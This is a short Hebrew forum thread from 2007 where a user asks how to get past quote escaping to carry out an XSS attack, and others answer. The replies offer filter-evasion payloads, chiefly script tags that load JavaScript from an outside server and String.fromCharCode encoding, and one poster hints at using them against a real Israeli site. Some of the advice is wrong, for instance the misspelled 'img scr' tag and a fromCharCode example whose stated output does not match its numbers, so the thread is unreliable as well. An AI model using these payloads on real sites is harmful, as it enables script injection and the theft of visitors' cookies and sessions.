קיצר בכמה מקומות הצלחתי הגיד להקפיץ הודעה אלרט עם מספרים, אבל ברגע שאני מכניס מרכאות (" "), אז הוא מסנן אותם(\") מישהו מכיר דרך להתגבר על זה?
אולי באיזה קידוד או משהו?
ראשי > אבטחת מידע > משהו נגד סינון מרכאות? (לXSS)
קיצר בכמה מקומות הצלחתי הגיד להקפיץ הודעה אלרט עם מספרים, אבל ברגע שאני מכניס מרכאות (" "), אז הוא מסנן אותם(\") מישהו מכיר דרך להתגבר על זה?
אולי באיזה קידוד או משהו?
img scr
בצורה כזו:
קוד:<img scr=http://server.com/jscript.js>
ש jscript.js יכיל סקיפט שאתה רוצה להריץ.
תנסה להשתמש בפונקציה string.fromcharcode
ז"א
קוד:x=string.fromcharcode(56,57,58,59);
alert (x);
זה יקפיץ
ABCD
אתה יכול גם להשתמש ב ASCII של הקוד.
נניח אם 106 זה הקוד האסקיי של "J" ו97 של "a" אז בצורה כזאת:
ja...עד שתגיע לקוד...
יש גם את אותה האופציה רק בבינארי או בסיס 16, אבל אני לא זוכר בע"פ.
[ההודעה נערכה על-ידי devil kide ב-25/06/2007 17:33:54]
יש מצב שאפשר לנצל עם זה גם באג בתפוז (:
זה קצת בעיה, מכיוון שאני מנסה להכניס כתובת, וברגע שאני עושה
http://
אז זה סוגר את זה..
קוד:
<script src=server.com/script.js></script>
וזה מפעיל
או שזה בעצם מתייחס לקוקיז מהדף ההוא?[ההודעה נערכה על-ידי Ratinho ב-25/06/2007 20:51:16]
img scr
בצורה כזו:
קוד:<img scr=http://server.com/jscript.js>
ש jscript.js יכיל סקיפט שאתה רוצה להריץ.
[ההודעה נערכה על-ידי devil kide ב-25/06/2007 17:33:54]
חחחחחחחח אתה רציני!? זה באמת עובד?!
ובלי מרכאות או עם
IE6 ,שבא בגרסה של הSP1,אני לא מוצא את הגרסה המלאה של הדפדפן, תסתפקו בזה.